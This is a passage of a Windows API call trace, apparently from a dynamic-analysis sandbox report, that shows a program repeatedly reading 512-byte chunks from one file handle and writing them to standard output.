lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.563] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.563] ReadFile 
(in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] GetFileType (hFile=0x50) returned 0x1 [0134.563] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0134.563] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.563] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.564] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.564] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, 
lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.564] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.564] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, 
lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.565] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.565] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, 
lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.565] GetFileType (hFile=0x50) returned 0x1 [0134.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.566] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.566] GetFileType (hFile=0x50) returned 0x1 [0134.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.566] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.566] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.566] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.566] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.566] GetFileType (hFile=0x50) returned 0x1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.566] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, 
lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.567] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile 
(in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.568] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 
[0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, 
lpOverlapped=0x0) returned 1 [0134.569] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.570] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, 